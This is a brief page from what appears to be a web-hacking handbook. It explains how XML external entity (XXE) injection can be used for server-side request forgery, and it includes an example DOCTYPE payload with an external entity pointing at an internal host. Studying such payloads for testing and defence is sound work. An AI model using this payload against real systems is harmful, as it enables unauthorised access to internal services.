handbook/tools/3.Web-Hacking/4.Injection/XXE/Commands/2.XXE-SSRF-attacks.md
2024-08-31 01:07:22 +02:00

289 B

Exploiting XXE to Perform SSRF Attacks

  • Need to do the following:
    • Define an external XML entity using the URL you want to target
    • Use the defined entity within a data value
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM " http://internal.vulnerable-
website.com/"> ]>